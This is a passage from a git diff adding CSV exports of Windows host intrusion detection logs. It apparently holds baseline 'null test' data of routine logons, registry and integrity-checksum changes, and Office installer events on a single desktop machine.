10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:37.880",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 10:25:36.078",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. 
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 2
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: No
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x36DE6
+ Linked Logon ID: 0x36DB7
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x154
+ Process Name: C:\Windows\System32\svchost.exe
+
+Network Information:
+ Workstation Name: DESKTOP-HUE026H
+ Source Network Address: 127.0.0.1
+ Source Port: 0
+
+Detailed Authentication Information:
+ Logon Process: User32
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:25:35.863",3,"Windows Workstation Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 2
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-21-438079597-2123118846-2669748851-1001
+ Account Name: John Williams
+ Account Domain: DESKTOP-HUE026H
+ Logon ID: 0x36DB7
+ Linked Logon ID: 0x36DE6
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x154
+ Process Name: C:\Windows\System32\svchost.exe
+
+Network Information:
+ Workstation Name: DESKTOP-HUE026H
+ Source Network Address: 127.0.0.1
+ Source Port: 0
+
+Detailed Authentication Information:
+ Logon Process: User32
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:25:34.110",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event."""
+"Apr 24, 2020 @ 10:25:33.625",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x248
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:25:31.685",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.",
+"Apr 24, 2020 @ 10:25:05.443",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters' checksum changed.
+Old md5sum was: '39324a091e8e394cfa0881ee3414520b'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: 'fa56f0ef6e21e4f64af4ae07bada3b859656ac2b'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+",
+"Apr 24, 2020 @ 10:25:05.428",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9' checksum changed.
+Old md5sum was: '3ab42836b91eda6d7a737f85db75cc0f'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: '3e85e472ca462ac01899caabb6d29f1f7cf46732'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+",
+"Apr 24, 2020 @ 10:25:02.060",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event."""
+"Apr 24, 2020 @ 10:25:01.950",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event."""
+"Apr 24, 2020 @ 10:24:49.661",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:24:23.587",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:24:08.428",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:24:05.276",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:23:47.724",3,"Windows Logon Success",,"""An account was successfully logged on.
+
+Subject:
+ Security ID: S-1-5-18
+ Account Name: DESKTOP-HUE026H$
+ Account Domain: WORKGROUP
+ Logon ID: 0x3E7
+
+Logon Information:
+ Logon Type: 5
+ Restricted Admin Mode: -
+ Virtual Account: No
+ Elevated Token: Yes
+
+Impersonation Level: Impersonation
+
+New Logon:
+ Security ID: S-1-5-18
+ Account Name: SYSTEM
+ Account Domain: NT AUTHORITY
+ Logon ID: 0x3E7
+ Linked Logon ID: 0x0
+ Network Account Name: -
+ Network Account Domain: -
+ Logon GUID: {00000000-0000-0000-0000-000000000000}
+
+Process Information:
+ Process ID: 0x24c
+ Process Name: C:\Windows\System32\services.exe
+
+Network Information:
+ Workstation Name: -
+ Source Network Address: -
+ Source Port: -
+
+Detailed Authentication Information:
+ Logon Process: Advapi
+ Authentication Package: Negotiate
+ Transited Services: -
+ Package Name (NTLM only): -
+ Key Length: 0
+
+This event is generated when a logon session is created. It is generated on the computer that was accessed.
+
+The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
+
+The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
+
+The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
+
+The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
+
+The impersonation level field indicates the extent to which a process in the logon session can impersonate.
+
+The authentication information fields provide detailed information about this specific logon request.
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
+ - Transited services indicate which intermediate services have participated in this logon request.
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 24, 2020 @ 10:23:47.354",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: '46cb3bdf23ef43d6ce23972203d529f7'
+New md5sum is : '1c4e04d793df8bd371434698d7441beb'
+Old sha1sum was: '267432bd00d7bec5d1d2a096cd54f7c3993d8873'
+New sha1sum is : '445eb561728c2ed4b3dc1e1f8173bdf8acae870c'
+",
diff --git a/data/NULLTEST_HIDS_3.csv b/data/NULLTEST_HIDS_3.csv
new file mode 100644
index 0000000..f3aa542
--- /dev/null
+++ b/data/NULLTEST_HIDS_3.csv
@@ -0,0 +1,1313 @@
+timestamp,"rule.level","rule.description","data.win.system.message","full_log"
+"May 22, 2020 @ 15:17:37.286",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Licensing Component. Product Version: 16.0.12730.20270. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""",
+"May 22, 2020 @ 15:17:35.865",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\sppredist.msi. Client Process Id: 6728.""",
+"May 22, 2020 @ 15:17:35.817",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Localization Component. Product Version: 16.0.12730.20206. Product Language: 1033. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""",
+"May 22, 2020 @ 15:17:35.676",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rintloc.en-us.16.msi. Client Process Id: 6728.""",
+"May 22, 2020 @ 15:17:35.630",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12730.20206. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""",
+"May 22, 2020 @ 15:17:35.349",3,"Windows Logon Success","""An account was successfully logged on.
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:17:34.567",3,"The Windows Search Service started","""The Windows Search Service started. +""", +"May 22, 2020 @ 15:17:34.442",3,"The database engine attached a database","""SearchIndexer (5516,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000015:0046:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000258 +J(0) +M(C:0K, Fs:26, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.006118 -0.001011 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:39, WS:120K # 0K, PF:144K # 0K, P:144K) +[4] 0.000155 +J(0) +[5] - +[6] - +[7] - +[8] 0.003427 -0.000845 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:51, WS:200K # 0K, PF:644K # 0K, P:644K) +[9] 0.012463 -0.000284 (5) CM -0.011993 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 112K, P:256K) +[10] 0.000322 -0.000172 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 0K, PF:96K # 96K, P:96K) +[11] 0.000013 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 8K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""", +"May 22, 2020 @ 15:17:34.379",3,"The database engine is starting a new instance","""SearchIndexer (5516,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""", +"May 22, 2020 @ 15:17:34.286",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: 
c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 6728.""", +"May 22, 2020 @ 15:17:30.990",3,"The Windows Search Service stopped normally","""Windows Search Service stopped normally. +""", +"May 22, 2020 @ 15:17:30.959",5,"The database engine stopped an instance","""SearchIndexer (716,T,97) Windows: The database engine stopped the instance (0). + +Dirty Shutdown: 0 + +Internal Timing Sequence: +[1] 0.000002 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000011 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[3] 0.000226 +J(CM:1, PgRf:15, Rd:0/1, Dy:3/17, Lg:590/15) +[4] 0.000004 +J(0) +[5] 0.021433 -0.000012 (54) CM -0.019747 (8) WT +J(CM:54, PgRf:0, Rd:0/54, Dy:0/0, Lg:0/0) +M(C:0K, Fs:331, WS:12K # 0K, PF:4K # 0K, P:4K) +[6] 0.002899 +J(0) +M(C:0K, Fs:1, WS:-6716K # 0K, PF:-6616K # 0K, P:-6616K) +[7] 0.000012 +J(0) +[8] 0.005098 -0.002884 (12) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:2113/2) +M(C:0K, Fs:23, WS:-180K # 0K, PF:-1092K # 0K, P:-1092K) +[9] 0.000434 -0.000391 (1) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:66/1) +M(C:0K, Fs:2, WS:8K # 0K, PF:0K # 0K, P:0K) +[10] 0.000004 +J(0) +[11] 0.001158 -0.000551 (2) WT +J(0) +[12] 0.000038 +J(0) +M(C:0K, Fs:0, WS:-4K # 0K, PF:-4K # 0K, P:-4K) +[13] 0.000224 +J(0) +M(C:0K, Fs:0, WS:0K # 0K, PF:16K # 0K, P:16K) +[14] 0.000067 +J(0) +M(C:0K, Fs:0, WS:-164K # 0K, PF:-176K # 0K, P:-176K) +[15] 0.000005 +J(0).""", +"May 22, 2020 @ 15:17:30.679",3,"Windows installer reconfigured the product","""Windows Installer reconfigured the product. Product Name: Office 16 Click-to-Run Extensibility Component. Product Version: 16.0.12730.20206. Product Language: 0. Manufacturer: Microsoft Corporation. Reconfiguration success or error status: 0.""", +"May 22, 2020 @ 15:17:16.177",3,"Windows Logon Success","""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""", +"May 22, 2020 @ 15:17:15.286",3,"Windows Installer began an installation process","""Beginning a Windows Installer transaction: c:\program files\microsoft office\root\integration\c2rint.16.msi. Client Process Id: 6728.""", +"May 22, 2020 @ 15:17:07.630",3,"Software Protection service scheduled successfully","""Successfully scheduled Software Protection service for re-start at 2020-05-23T15:12:06Z. Reason: RulesEngine.""", +"May 22, 2020 @ 15:16:51.458",3,"Service startup type was changed","""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""", +"May 22, 2020 @ 15:16:50.177",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +" +"May 22, 2020 @ 15:16:49.193",3,"Windows Logon Success","""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
